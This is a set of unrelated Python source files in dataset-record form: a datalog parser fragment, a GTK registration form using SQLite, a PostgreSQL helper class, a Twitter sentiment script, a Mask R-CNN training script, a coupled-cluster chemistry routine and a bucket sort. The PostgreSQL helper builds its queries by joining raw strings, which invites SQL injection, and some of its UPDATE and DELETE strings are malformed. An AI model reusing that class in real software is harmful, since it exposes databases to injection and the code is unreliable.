condition \n tables = []\n #match = re.search(\"(\\w+)\\.(\\w+)\", lop)\n #if match: lop = match.group(2)\n #match = re.search(\"(\\w+)\\.(\\w+)\", rop)\n #if match: rop = match.group(2)\n\n if lop in self.column_to_table:\n source_tables = self.column_to_table[lop]\n else:\n source_tables = self.column_to_table[rop]\n\n for source,table in source_tables.items():\n if source not in cond_map: cond_map[source] = {}\n if table not in cond_map: cond_map[source][table] = []\n cond_map[source][table].append([lop, op, rop])\n return cond_map\n\n def resolveNegation(self):\n negation_map = {}\n negation_values = {}\n for val in self.conditions:\n match = re.search('not (\\S+)\\((.*)\\)', val)\n if not match: continue\n table, columns = match.group(1), match.group(2)\n for idx, col in enumerate(columns.split(',')):\n match = re.search('\"(.*)\"', col)\n if match:\n negation_map[table+':'+str(idx)] = match.group(1)\n continue\n match = re.search('(\\d+)', col)\n if match:\n negation_map[table+':'+str(idx)] = match.group(1)\n\n for key,neg_value in negation_map.items():\n table, idx = key.split(':')\n negation_values[table] = { self._table_columns[table][int(idx)]: neg_value}\n \n #for table,negs in self.negation_values.items():\n # for n,v in negs.items():\n # self.conds.append(\"{}.{} != '{}'\".format(table, n, v))\n\n","sub_path":"query_capability/datalog_parser.py","file_name":"datalog_parser.py","file_ext":"py","file_size_in_byte":6154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"303016329","text":"#!/usr/bin/env python\n#-*- encoding: utf-8 -*-\n\n\n#Author: Pedro Jefferson\n#Email: pedrojefferson.developer@gmail.com\n#Twitter: _pedrojefferson\n#Github: 1pedro\n \nfrom gi.repository import Gtk\nfrom gi.repository import Gdk\nimport sqlite3\n\n \nclass Main(Gtk.Window):\n def __init__(self):\n #Main Window\n Gtk.Window.__init__(self, 
title=\"SCU - Sistema de Cadastro de Usuários\")\n Gtk.Window.set_size_request(self,600,600)\n Gtk.Window.set_resizable(self,False)\n Gtk.Window.modify_bg(self,Gtk.StateType.NORMAL,Gdk.color_parse(\"#FFFFFF\"))\n\t\t#Main Grid Creation\n self.grid_total = Gtk.Grid()\n self.add(self.grid_total)\n\t\t#Label Grid(grid1) \n self.grid1 = Gtk.Grid()\n\t\t#Box\n self.box1 = Gtk.Box()\n self.grid1.attach(self.box1,0,0,1,1)\n self.labelinit = Gtk.Label()\n INITTEXT = \"\"\"\\nSistema de Cadastro de Usuários\\n\"\"\"\n self.labelinit.set_markup(INITTEXT)\n self.box1.pack_start(self.labelinit,expand=True,fill=True,padding=40)\n self.grid2 = Gtk.Grid(column_homogeneous=True,column_spacing=1,row_spacing=10)\n\t\t#Label e entry Nome\n self.label_nome = Gtk.Label(label=\"Nome Completo *\")\n self.label_nome.set_halign(Gtk.Align.END) \n self.grid2.attach(self.label_nome,0,0,1,1)\n self.entry_nome = Gtk.Entry()\n self.entry_nome.set_max_length(150)\n self.entry_nome.set_width_chars(30) \n self.entry_nome.set_halign(Gtk.Align.START)\n self.grid2.attach(self.entry_nome, 1,0,1,1)\n self.entry_nome.connect(\"changed\",self.on_entry_nome_changed)\n\t\t#Label e entry do CPF\n self.label_cpf = Gtk.Label(label=\"CPF *\")\n self.label_cpf.set_halign(Gtk.Align.END)\n self.grid2.attach(self.label_cpf,0,3,1,1)\n self.entry_cpf = Gtk.Entry()\n self.entry_cpf.set_max_length(max=11)\n self.entry_cpf.set_width_chars(11)\n self.entry_cpf.set_halign(Gtk.Align.START)\n self.grid2.attach(self.entry_cpf,1,3,1,1)\n\t\t#Telefone\n self.label_tel = Gtk.Label(label=\"Tel \")\n self.label_tel.set_halign(Gtk.Align.END)\n self.grid2.attach(self.label_tel,0,4,1,1)\n self.entry_tel = Gtk.Entry()\n self.grid2.attach(self.entry_tel,1,4,1,1)\n self.entry_tel.set_max_length(max=17)\n self.entry_tel.set_width_chars(17)\n self.entry_tel.set_halign(Gtk.Align.START)\n self.entry_tel.set_text(\"+99 99 999999999\")\n self.entry_tel.modify_fg(Gtk.StateType.NORMAL,Gdk.color_parse(\"#999999\"))\n\t\t#Email\n self.label_email = Gtk.Label(label=\"Email \")\n self.label_email.set_halign(Gtk.Align.END)\n self.grid2.attach(self.label_email,0,5,1,1)\n self.entry_email = Gtk.Entry()\n self.grid2.attach(self.entry_email,1,5,1,1)\n self.entry_email.set_max_length(80)\n self.entry_email.set_halign(Gtk.Align.START)\n\t\t#Data de Nascimento\n self.label_nasc = Gtk.Label(label=\"Data de Nascimento *\")\n self.label_nasc.set_halign(Gtk.Align.END)\n self.grid2.attach(self.label_nasc,0,6,1,1)\n self.entry_nasc = Gtk.Entry()\n self.entry_nasc.set_max_length(12)\n self.entry_nasc.set_width_chars(12)\n self.entry_nasc.set_halign(Gtk.Align.START)\n self.grid2.attach(self.entry_nasc,1,6,1,1)\n self.entry_nasc.set_text(\"DD/MM/YYYY\")\n self.entry_nasc.modify_fg(Gtk.StateType.NORMAL,Gdk.color_parse(\"#999999\"))\n\t\t#Estado\n self.combo = Gtk.ComboBoxText()\n self.label_combo = Gtk.Label(label=\"Estado *\")\n self.label_combo.set_halign(Gtk.Align.END)\n self.grid2.attach(self.label_combo,0,7,1,1)\n self.combo.insert(0,\"0\", \"Bahia\")\n self.combo.insert(1,\"1\", \"São Paulo\")\n self.combo.insert(2,\"2\", \"Minas Gerais\")\n self.combo.insert(3,\"3\", \"Rio de Janeiro\")\n self.combo.insert(4,\"4\", \"Tocantins\")\n self.combo.insert(5,\"5\", \"Mato Grosso do Sul\")\n self.combo.insert(6,\"6\", \"Pernambuco\")\n self.combo.set_halign(Gtk.Align.START)\n self.grid2.attach(self.combo, 1,7,1,1)\n\t\t#Cidade\n self.combo2 = Gtk.ComboBoxText()\n self.label_combo2 = Gtk.Label(label=\"Cidade *\")\n self.label_combo2.set_halign(Gtk.Align.END)\n 
self.grid2.attach(self.label_combo2,0,8,1,1)\n self.combo2.insert(0,\"0\",\"Camaçari\")\n self.combo2.insert(1,\"1\",\"Dias D'vila\")\n self.combo2.insert(2,\"2\",\"Vila de Abrantes\")\n self.combo2.insert(3,\"3\",\"Salvador\")\n self.combo2.set_halign(Gtk.Align.START)\n self.grid2.attach(self.combo2,1,8,1,1)\n\t\t#Comit\n self.comit = Gtk.Button(label=\"Gravar\")\n self.comit.set_halign(Gtk.Align.CENTER)\n self.grid_total.attach(self.comit,0,2,2,2)\n self.comit.set_size_request(100,40)\n self.comit.connect(\"clicked\", self.on_comit_clicked)\n\t\t#Ajustando as Grids\n self.grid2.set_row_spacing(10)\n self.grid1.set_row_spacing(10)\n\t\t#Licensa, Autoria\n self.box3 = Gtk.Box()\n LIC = \"\"\"Developed by: Pedro Jefferson\\n Blog: peddroblog.wordpress.com \\n Email: peddro.jeff@gmail.com\" \"\"\"\n self.label_lic = Gtk.Label()\n self.label_lic.set_markup(LIC)\n self.box3.pack_start(self.label_lic,expand=True,fill=True,padding=20)\n \t\t#Colocando Grid1 e Grid2 na grid total \n self.grid_total.set_row_spacing(30)\n self.grid_total.attach(self.grid1, 0,0,2,1)\n self.grid_total.attach(self.grid2, 0,1,1,1)\n self.grid_total.attach(self.box3, 0,10,1,1)\n \n \n def on_entry_nome_changed(self, widget):\n nome = widget.get_text()\n nome = nome.upper()\n return widget.set_text(nome)\n \n \n def on_comit_clicked(self, widget):\n nome = self.entry_nome.get_text()\n cpf = self.entry_cpf.get_text()\n data_nasc = self.entry_nasc.get_text()\n estado = self.combo.get_active_text()\n cidade = self.combo2.get_active_text()\n tel = self.entry_tel.get_text()\n email = self.entry_email.get_text()\n \n if nome != None and cpf != None and data_nasc != None \\\n and estado != None and cidade != None:\n return comit_dados(None,nome,cpf, tel, email, data_nasc,estado,cidade)\n pass\n \n \ndef comit_dados(*args):\n connection = sqlite3.connect('cadastro.db')\n connection.text_factory = str\n c = connection.cursor()\n c.execute('CREATE TABLE IF NOT EXISTS dados (_id integer , nome text, cpf integer, tel varchar(17), email varchar(150), data_nasc varchar(12), estado varchar(30), cidade varchar(30))')\n c.execute('INSERT INTO dados (_id ,nome, cpf, tel, email, data_nasc, estado, cidade) VALUES (?,?,?,?,?,?,?,?)', (args))\n connection.commit()\n \n\nwin = Main()\nwin.connect(\"delete-event\", Gtk.main_quit)\nwin.show_all()\nGtk.main()\n\n","sub_path":"form.py","file_name":"form.py","file_ext":"py","file_size_in_byte":7867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"515416801","text":"#-*- coding: utf-8 -*-\nimport psycopg2\n\n\nclass PostgreSQL:\n def __init__(self, log, ip, db, user, password, port=5432):\n self._log_ = log\n if self._log_ is None:\n print(\"'Log' should not be empty.\")\n exit(1)\n self._conn_string_ = \"host='\" + ip + \"' dbname ='\" + db + \"' user='\" + user + \"' password='\" + password + \\\n \"' port='\" + str(port) + \"'\"\n self._conn_ = None\n self._cursor_ = None\n\n def is_conn(self):\n try:\n self._conn_ = psycopg2.connect(self._conn_string_)\n self._conn_.set_client_encoding('UTF8')\n self._cursor_ = self._conn_.cursor()\n return True\n except Exception as e:\n print(\"postgresql database connection error : \", e)\n return False\n\n def select(self, table, col=None, option=None):\n if table is None or table == \"\":\n self._log_.write(\"SQL ERROR\")\n return None\n if self.is_conn():\n column = \"*\" if col is None or col == \"\" else col\n option = \"\" if option is None or option == \"\" else \" WHERE \" + option\n sql = 
\"SELECT array_to_json(array(SELECT row_to_json(tmp) FROM (\" \\\n \"SELECT \" + column + \" FROM \" + table + option + \") tmp));\"\n self._cursor_.execute(sql)\n self._conn_.commit()\n return self._cursor_.fetchall()[0][0]\n else:\n return None\n\n def insert(self, table, values, col=None):\n if table is None or table == \"\" or values is None or values == \"\":\n self._log_.write(\"SQL ERROR\")\n return None\n if self.is_conn():\n col = \"\" if col is None else \"(\" + col + \")\"\n sql = \"INSERT INTO \" + table + col + \" VALUES (\" + values + \");\"\n self._cursor_.execute(sql)\n self._conn_.commit()\n return True\n else:\n return False\n\n def update(self, table, sets, options=None):\n if table is None or table == \"\" or sets is None or sets == \"\":\n self._log_.write(\"SQL ERROR\")\n return None\n if self.is_conn():\n options = \"\" if options is None else \"WHERE \" + options + \"\"\n sql = \"UPDATE \" + table + \"SET \" + sets + options + \";\"\n self._cursor_.execute(sql)\n self._conn_.commit()\n return True\n else:\n return False\n\n def delete(self, table, options=None):\n if table is None or table == \"\":\n self._log_.write(\"SQL ERROR\")\n return None\n if self.is_conn():\n options = \"\" if options is None else \"WHERE \" + options + \"\"\n sql = \"DELETE FROM \" + table + options + \";\"\n self._cursor_.execute(sql)\n self._conn_.commit()\n return True\n else:\n return False","sub_path":"deepgeo/src/deepGeoPgsql.py","file_name":"deepGeoPgsql.py","file_ext":"py","file_size_in_byte":2888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"108615686","text":"# In this assignment you must do a Twitter search on any term\n# of your choice.\n# Deliverables:\n# 1) Print each tweet\n# 2) Print the average subjectivity of the results\n# 3) Print the average polarity of the results\n\n# Be prepared to change the search term during demo.\n\nimport tweepy\nfrom textblob import TextBlob\nimport sys \n\n# Unique code from Twitter\n\n\n# Boilerplate code here\nauth = tweepy.OAuthHandler(consumer_key,consumer_secret)\nauth.set_access_token(access_token,access_token_secret)\n\n#Now we can Create Tweets, Delete Tweets, and Find Twitter Users\napi = tweepy.API(auth)\nprint (\"------------------------------------------------------------------\")\nsearch_topic = input(\"Please enter a Twitter search topic of your choice: \")\nprint (\"------------------------------------------------------------------\")\npublic_tweets = api.search(search_topic)\ntotal_subjectivity = 0\ntotal_polarity = 0\nt_sub = 0\nt_pol = 0\n\nprint (\"TWEETS ABOUT\", search_topic.upper(), \":\")\n\n#Creating a for loop to count the total number of tweets and get its respective polarity and subjectivity scores\nfor tweet in public_tweets:\n\tprint (tweet.text)\n\tanalysis = TextBlob(tweet.text)\n\tt_sub += analysis.sentiment.subjectivity\n\tt_pol += analysis.sentiment.polarity\n\ttotal_subjectivity += 1\n\ttotal_polarity += 1\n\nprint (\"*******************************************\")\n#Calculating and printing out the average subjectivity and polarity scores of the collected tweets\navg_subjectivity = t_sub/total_subjectivity\navg_polarity = t_pol/total_polarity\nprint(\"Average subjectivity is\", avg_subjectivity)\nprint(\"Average polarity is\", avg_polarity)\nprint 
(\"*******************************************\")\n\n","sub_path":"twitterhw3b.py","file_name":"twitterhw3b.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"349557075","text":"import os\nimport numpy as np\nimport torch\nimport torch.utils.data\nfrom PIL import Image, ImageOps\nimport torchvision\nfrom torchvision.models.detection.faster_rcnn import FastRCNNPredictor\nfrom torchvision.models.detection.mask_rcnn import MaskRCNNPredictor\nfrom engine import train_one_epoch, evaluate\nimport utils\nimport transforms as T\n\npath = '/home/yonga/keremWorkSpace/CancerCellsCounterWithMaskR-Cnn/Dataset'\n\ndatasetSize= 0\nclass PennFudanDataset(torch.utils.data.Dataset): \n # Dataseti oluşturan onu modifiye eden sınıf\n def __init__(self, root, transforms=None): # yapıcı method\n global datasetSize\n self.root = root# root : dataset için resimlerin yolu \n self.transforms = transforms #Bu transforms.py dosyasından çektiğimiz Compose sınıfı, amacı dataseti modifiye etmek.\n\n self.imgs = list(sorted(os.listdir(os.path.join(root, \"images\")))) #bütün orjinal resimlerin isim listesi\n self.masks = list(sorted(os.listdir(os.path.join(root, \"masks\")))) # bütün maskelerin isim listesi\n \"\"\"\n #Burada Elimde olan Gpu ile alabildiğim maksimum dataset boyutu 444 orjinal resim olduğu için geriye kalanları listeden siliyorum.\n theValue = 100\n del self.imgs[theValue:] \n del self.masks[theValue:] \n \"\"\"\n datasetSize = len(self.imgs)\n def __getitem__(self, idx): #Bu method pennfudandataset sınıfına ait bir nesnenin döndürülmesi halinde çağırılan özel bir methoddur.\n # imageleri ve maskeleri değişkenlere atar\n img_path = os.path.join(self.root, \"images\", self.imgs[idx])\n mask_path = os.path.join(self.root, \"masks\", self.masks[idx])\n #idx değişkeni veriseti dönerken kendiliğinden artan indextir.Yani veriseti listesinin boyutu kadar döner.\n\n img = Image.open(img_path).convert(\"RGB\") # Image operatörü PIL tipinde bir resime erişmek içindir.Burada-\n #yolunu verdiğimiz her tek resim için img değişkenine bir tane resim atanır ve bu resmi rgb formatına çeviririz.\n mask = Image.open(mask_path)#aynı şeyi maskeler için yapıyoruz fakat!, maskeleri rgb ye çevirmiyoruz çünkü her ayrı renk-\n #pikseli ayrı bir blob'a denk gelecek şekilde ayarlandığı için greyscale kalmalı!\n\n mask = np.array(mask)\n # maskeyi numpy array şekline çeviriyoruz\n\n obj_ids = np.unique(mask) # burada dizide olan eleman çeşidini görmek için np.uniqiue methodunu kullanıyoruz.\n #yani bunun içeriği 3 tane blob var ise arkaplan dahil olmak üzere 4 tane eleman olacak ([0,1,2,3]).\n # aynı zamanda np.unique methodu verileri küçükten büyüğe sıralar.\n\n \n obj_ids = obj_ids[1:] # ilk eleman arkaplan olduğundan onu siliyoruz.\n\n masks = mask == obj_ids[:, None, None]#blobların olduğu pikselleri True , olmadığı pikselleri false yaparak masks numpy dizisini ayarlıyoruz\n\n\n # her maskenin bounding box koordinatlarını alma aşaması : \n num_objs = len(obj_ids) # blob sayısını num_objs değişkenine setler.\n boxes = []\n for i in range(num_objs):\n pos = np.where(masks[i])# masks dizisindeki true olan(yani blobun olduğu x ve y koordinatı) x dizisi ve y dizisi olarak döndürür-\n #ve bu iki diziyi pos'a setler\n xmin = np.min(pos[1])\n xmax = np.max(pos[1])\n ymin = np.min(pos[0])\n ymax = np.max(pos[0])\n #x ve y koordinatlarının max ve min değerlerini değişkenlere atar.-\n # Bu değişkenler bizim bounding box dikdörtgenin köşegen 
koordinatlarıdır.\n boxes.append([xmin, ymin, xmax, ymax])#sonunda boxes'dizisine eleman olarak verilir.\n\n boxes = torch.as_tensor(boxes, dtype=torch.float32)#boxes dizisini torch.float32 tipinde bir tensor'a çevirdik\n # there is only one class\n labels = torch.ones((num_objs,), dtype=torch.int64) #blob sayısını labels adındaki diziye atıyoruz.-\n #Bu dizide blob sayısı kadar eleman olsa ve bunların hepsi 1 olsa yeterlidir.Çünkü sadece 1 etiketimiz var.\n masks = torch.as_tensor(masks, dtype=torch.uint8) #maskelerimizide tensor'a çeviriyoruz.\n\n image_id = torch.tensor([idx])# idx değerini bir nevi image_id olarak tutuyoruz(amaç resmin idx'ine erişebilme)\n\n area = (boxes[:, 3] - boxes[:, 1]) * (boxes[:, 2] - boxes[:, 0]) # bounding box'un alanını buluyoruz.\n\n #print('ALAN ================== ' ,area)\n \n # suppose all instances are not crowd\n iscrowd = torch.zeros((num_objs,), dtype=torch.int64)#blob sayısı kadar 0 matrisi oluşturur\n\n #şimdi tüm bu özelliklerimizi target adında bir listeye atalım.\n target = {}\n target[\"boxes\"] = boxes\n target[\"labels\"] = labels\n target[\"masks\"] = masks\n target[\"image_id\"] = image_id\n target[\"area\"] = area\n target[\"iscrowd\"] = iscrowd\n \n #Bu if blogunda dataset'deki veriler modifiye edilecekse yani bir transforms değişkenimiz içerisinde objemiz var ise\n if self.transforms is not None:\n img, target = self.transforms(img, target)#img ve target'i modifiye et\n\n return img, target\n\n def __len__(self):\n return len(self.imgs)#veri setindeki resimlerin sayısını döndürür.\n \ndef get_instance_segmentation_model(num_classes):# pretrained modeli döndüren method\n #num_classes'ı aşağıda 2 vereceğiz-\n #2 vermemizin sebebi 1 etiketimizin bloblar diğer etiketimizin arkaplan olmasıdır.\n # load an instance segmentation model pre-trained on COCO\n model = torchvision.models.detection.maskrcnn_resnet50_fpn(pretrained=True)\n #Burada torchvision models üzerinden maskrcnn_resnet50_fpn modelimizi indiriyoruz\n\n\n # get the number of input features for the classifier\n in_features = model.roi_heads.box_predictor.cls_score.in_features\n # replace the pre-trained head with a new one\n model.roi_heads.box_predictor = FastRCNNPredictor(in_features, num_classes)\n\n # now get the number of input features for the mask classifier\n in_features_mask = model.roi_heads.mask_predictor.conv5_mask.in_channels\n hidden_layer = 256\n # and replace the mask predictor with a new one\n model.roi_heads.mask_predictor = MaskRCNNPredictor(in_features_mask,\n hidden_layer,\n num_classes)\n\n return model\n\ndef get_transform(train):#Burada penfudandataset'e verdiğimiz transforms objemizin özelliklerini belirliyoruz\n transforms = []\n transforms.append(T.ToTensor())# PIL image 'i Pytorch Tensoruna çevirme özelliğini verdik\n if train:\n \n transforms.append(T.RandomHorizontalFlip(0.5))#resimleri rassal olarak döndürmesini sağlıyoruz\n #amacımız tabiki veri setinin çeşitliliğini arttırmak\n return T.Compose(transforms)\n\n# dataseti tanımlıyoruz ve resimleri modifiye etmesini istiyoruz\ndataset = PennFudanDataset(path, get_transform(train=True))\ndataset_test = PennFudanDataset(path, get_transform(train=False))\n\ndatasetTestSize = int((datasetSize*30)/100)\n\nprint('Dataset Test Boyutu : ', datasetTestSize)\nprint('Dataset Eğitim Boyutu : ', datasetSize-datasetTestSize)\n\n# dataseti ve test için kullanılacak dataseti ayarlıyoruz\ntorch.manual_seed(1)\nindices = torch.randperm(len(dataset)).tolist()\ndataset = torch.utils.data.Subset(dataset, 
indices[:-datasetTestSize])\ndataset_test = torch.utils.data.Subset(dataset_test, indices[-datasetTestSize:])\n#dataseti kardık ve teste 50 veri, geriye kalan veriyide datasetimize aktardık.\n\n# training ve validation için dataloaderı ayarlıyoruz\ndata_loader = torch.utils.data.DataLoader(\n dataset, batch_size=3, shuffle=True, num_workers=0,\n collate_fn=utils.collate_fn)\n\ndata_loader_test = torch.utils.data.DataLoader(\n dataset_test, batch_size=1, shuffle=False, num_workers=0,\n collate_fn=utils.collate_fn)\n#buradaki num_workers değeri eğitimi threadlere bölüyor.\n#Eğer bir tane ekran kartımız var ise bunları 0 yapmalıyız\ndevice = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')\n\n#device = torch.device('cpu')\n#Çalıştırılacak cihaz olarak uygunsa Gpu çalışması için cuda, uygun değilse cpu ayarlamasını sağlıyoruz.\n\nnum_classes = 2 #Daha öncede açıkladığım gibi 2 tane sınıfımız var biri arkaplan biri blob etiketimiz.\n\n#pretrained modelimizi çekiyoruz\nmodel = get_instance_segmentation_model(num_classes)\n# modele uygun cihazda çalışması için bildiri yapıyoruz\nmodel.to(device)\n\n# optimizer yapıcısı\nparams = [p for p in model.parameters() if p.requires_grad]\n\n#optimizer = torch.optim.SGD(params, lr=0.005, momentum=0.9, weight_decay=0.0005)\noptimizer =torch.optim.Adamax(params, lr=0.002, betas=(0.9, 0.999), eps=1e-08, weight_decay=0)\n\n# and a learning rate scheduler which decreases the learning rate by\n# 10x every 3 epochs\nlr_scheduler = torch.optim.lr_scheduler.StepLR(optimizer,\n step_size=3,\n gamma=0.1)\n\n# 3 epoch eğiticez\nnum_epochs = 1000\n\n#Eğitimimizin başladığı bölüm\nfor epoch in range(num_epochs):\n # 1 epoch eğitim her epochu ekrana bastıran method\n train_one_epoch(model, optimizer, data_loader, device, epoch, print_freq=100)\n\n\n # learning rate'i güncelliyoruz\n lr_scheduler.step()\n\n # dataset_test ile test yaptığımız kısım\n evaluate(model, data_loader_test, device=device)\n\n if epoch % 10 ==0:\n filePath = '/home/yonga/keremWorkSpace/CancerCellsCounterWithMaskR-Cnn/TrainAndPrediction//maskRCNN_model_'+str(epoch)+'.h5'\n torch.save(model.state_dict(), filePath)\n\n\n#burada modelimizi daha sonra kullanmak için dışarıya kaydediyoruz\ntorch.save(model, \"/home/yonga/keremWorkSpace/CancerCellsCounterWithMaskR-Cnn/TrainAndPrediction/modelv1.h5\")\n\n\n\n\n\"\"\"\n#burada kaydettiğimiz modeli kullanmak için onu dışarıdan çağırıyoruz\nsavedmodel = torch.load(\"/home/yonga/keremWorkSpace/BalıkSayma/FishCounterWithMaskRCNN/model.h5\")\n#modeli evalation moduna alıyoruz burada device belirtmemiz gerekmedi bunu araştırmam gerekiyor\n#kodumuz sorunsuz bir şekilde gpu 'da çalışıyor sanırım önceden modeli gpuda çalışacak şekilde-\n#kaydettiğimiz için.\nsavedmodel.eval()\n\nimport torchvision.transforms as trans #torchvision'un transforms.py dosyasını çekiyoruz\n\n\n#Burada transforms'un ne yapacağını ona söylüyoruz\nloader = trans.Compose([trans.ToTensor()])#loader resmi PIL image'den tensora çeviriyor\n\nunloader = trans.ToPILImage() # unloader ise resmi tensordan PIL image'e çeviriyor\n\n\n#Bu method image'i PIL image tipinde açar ve bunu tensor'a çevirir\ndef image_loader(image_name):\n image = Image.open(image_name)\n image = loader(image)\n return image\n\n#resmimizin yolu\np = \"/home/yonga/keremWorkSpace/BalıkSayma/FishCounterWithMaskRCNN/Basler_raL2048-48gm__22248034__20181106_144201677_0114.tiff\"\n\n\ntahminResmi = image_loader(p)\ntorch.cuda.empty_cache()#gpu'nun cache'ini temizler, yer açar\n\nimport time\nstart = 
time.process_time()\nwith torch.no_grad():\n prediction = savedmodel([tahminResmi.to(device)])\nprint(time.process_time() - start)\n\nprint(prediction[0]['masks'].shape)\n\"\"\"","sub_path":"TrainAndPrediction/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":11408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"436561028","text":"import psi4\nimport numpy as np\nimport sys \nsys.path.append('.')\nfrom uhf import compute_uhf\nfrom tools import *\nimport time\n\ndef show_progress(timings, printif):\n\n # Function to display the progress of computation setup\n\n if len(timings) > 0 and printif == print:\n sys.stdout.write(\"\\033[F\"*5)\n\n tasks = \"\"\"\n Building:\n \\U0001F426 Spin-Orbital arrays {} \n \\U0001F986 MO integrals {}\n \\U0001F9A2 D[ijab] {}\"\"\"\n\n x = []\n for t in timings:\n x.append(emoji('check') + ' ' + '{:10.5f} seconds'.format(t))\n\n while len(x) < 3:\n x.append('')\n\n printif(tasks.format(*x))\n\ndef CCD_Energy(T, V):\n\n return (1/4)*np.einsum('mncd, mncd -> ', V, T, optimize='optimal')\n\ndef CCD_Amplitude(T, D, Voovv, Voooo, Vvvvv, Vvoov):\n\n newT = np.zeros(T.shape)\n\n # 1st Diagram\n newT += Voovv\n\n # 2nd Diagram\n newT += 0.5*np.einsum('cdab, ijcd -> ijab', Vvvvv, T, optimize='optimal')\n\n # 3rd Diagram\n newT += 0.5*np.einsum('ijkl, klab -> ijab', Voooo, T, optimize='optimal')\n\n # 4th Diagram \n X = np.einsum('cjkb, ikac -> ijab', Vvoov, T, optimize='optimal')\n newT += X - X.transpose(1,0,2,3) - X.transpose(0,1,3,2) + X.transpose(1,0,3,2)\n\n # 5th Diagram\n newT += 0.25*np.einsum('klcd, klab, ijcd -> ijab', Voovv, T, T, optimize='optimal')\n\n # 6th Diagram\n X = np.einsum('klcd, ikac, ljdb -> ijab', Voovv, T,T, optimize='optimal')\n #newT += X - X.transpose(0,1,3,2) - X.transpose(1,0,2,3) + X.transpose(1,0,2,3)\n newT += X - X.transpose(1,0,2,3)\n\n # 7th Diagram\n X = np.einsum('klcd, klca, ijdb -> ijab', Voovv, T, T, optimize='optimal')\n newT += -0.5*(X - X.transpose(0,1,3,2))\n\n # 8th Diagram\n X = np.einsum('klcd, kicd, ljab -> ijab', Voovv, T, T, optimize='optimal')\n newT += -0.5*(X - X.transpose(1,0,2,3))\n\n newT *= D\n\n rms = np.sqrt(np.sum(np.square(newT - T)))/(T.size)\n\n return newT, rms\n\ndef compute_CCD(Settings, silent=False, compare=True):\n\n t0 = time.time()\n\n printif = print if not silent else lambda *k, **w: None\n\n Escf, Ca, Cb, epsa, epsb, _, g, Vnuc = compute_uhf(Settings, return_C=True, return_integrals=True, silent=silent)\n \n printif(\"\"\"\n =======================================================\n Spin-Orbital Coupled Cluster Doubles \n {}\n =======================================================\n \"\"\".format('\\U0001F9D9'))\n\n tsave = []\n show_progress(tsave, printif)\n t = time.time()\n\n # Create Spin-Orbital arrays\n C = np.block([\n [Ca, np.zeros(Ca.shape)],\n [np.zeros(Cb.shape), Cb]\n ]) \n\n eps = np.concatenate((epsa, epsb)) \n\n g = np.kron(np.eye(2), g)\n g = np.kron(np.eye(2), g.T)\n\n\n # re-Sorting orbitals\n s = np.argsort(eps)\n eps = eps[s]\n C = C[:,s]\n\n tsave.append(time.time() - t)\n show_progress(tsave, printif)\n t = time.time()\n \n # Get the MO integral\n\n nelec = Settings['nalpha'] + Settings['nbeta']\n # Converto to Physicists notation\n g = g.transpose(0,2,1,3)\n # Antisymmetrize\n g = g - g.transpose(0,1,3,2)\n\n # Save Slices\n ERI = lambda a,b,c,d: np.einsum('ap,bq,cr,ds,abcd->pqrs', C[:,a], C[:,b], \n C[:,c], C[:,d], g, optimize='optimal')\n o = slice(0, nelec)\n v = slice(nelec, len(g))\n Voovv 
= ERI(o,o,v,v)\n Voooo = ERI(o,o,o,o)\n Vvvvv = ERI(v,v,v,v)\n Vvoov = ERI(v,o,o,v)\n\n g = None\n\n tsave.append(time.time() - t)\n show_progress(tsave, printif)\n t = time.time()\n\n # Get eigenvalues Matrix D\n new = np.newaxis\n eo = eps[:nelec]\n ev = eps[nelec:]\n D = 1.0/(eo[:, new, new, new] + eo[new, :, new, new] - ev[new, new, :, new] - ev[new, new, new, :])\n\n tsave.append(time.time() - t)\n show_progress(tsave, printif)\n t = time.time()\n\n # Initial guess for amplitudes\n\n T = Voovv*D\n\n # Get MP2 energy\n\n E = CCD_Energy(T, Voovv)\n\n printif('\\nMP2 Energy: {:<15.10f}\\n'.format(E + Escf))\n\n # Setup iteration options\n rms = 0.0\n dE = 1\n ite = 1\n rms_LIM = 10**(-8)\n E_LIM = 10**(-12)\n t0 = time.time()\n printif('\\U00003030'*20)\n\n # Start CC iterations\n while abs(dE) > E_LIM or rms > rms_LIM:\n t = time.time()\n if ite > Settings[\"cc_max_iter\"]:\n raise NameError('CCD equations did not converge')\n T, rms = CCD_Amplitude(T, D, Voovv, Voooo, Vvvvv, Vvoov)\n dE = -E\n E = CCD_Energy(T, Voovv)\n dE += E\n printif(\"Iteration {}\".format(numoji(ite)))\n printif(\"\\U000027B0 Correlation energy: {:< 15.10f}\".format(E))\n printif(\"\\U0001F53A Energy change: {:< 15.10f}\".format(dE))\n printif(\"\\U00002622 Max RMS residue: {:< 15.10f}\".format(rms))\n printif(\"\\U0001F570 Time required: {:< 15.10f}\".format(time.time() - t))\n printif('\\U00003030'*20)\n ite += 1\n\n printif('\\U0001F3C1 CCD Energy: {:<15.10f}'.format(E + Escf))\n printif('\\U000023F3 CCD iterations took %.2f seconds.\\n' % (time.time() - t0))\n\n return (E + Escf)\n\n\nif __name__ == '__main__':\n\n from input import Settings\n compute_CCD(Settings)\n","sub_path":"Combined/CCD.py","file_name":"CCD.py","file_ext":"py","file_size_in_byte":5241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"125328251","text":"import random\r\n#random.seed(0)\r\n\r\n\r\ndef bucket_sort(mylist):\r\n # initialize the buckets\r\n mydict = {}\r\n # place the values to be sorted in the buckets\r\n for i in mylist:\r\n try:\r\n mydict[i//10].append(i)\r\n except KeyError:\r\n mydict[i//10] = [i]\r\n # sort each bucket\r\n result = []\r\n for i in mydict.values():\r\n i.sort()\r\n # concatenate your bucket to the result\r\n keys = list(mydict.keys())\r\n keys.sort()\r\n for key in keys:\r\n result.extend(mydict[key])\r\n return result\r\n\r\n\r\ndef main():\r\n \"\"\" this is not exactly relevant, but the following 4 lines of\r\n code can be replaced by one line:\r\n list_a = [random.randint(0, 1000) for i in range(100)]\r\n \"\"\"\r\n listA=[]\r\n for i in range(10):\r\n a = random.randint(0,1000)\r\n listA.append(a)\r\n print(listA)\r\n listA = bucket_sort(listA)\r\n print(\"SORTED:\", listA) 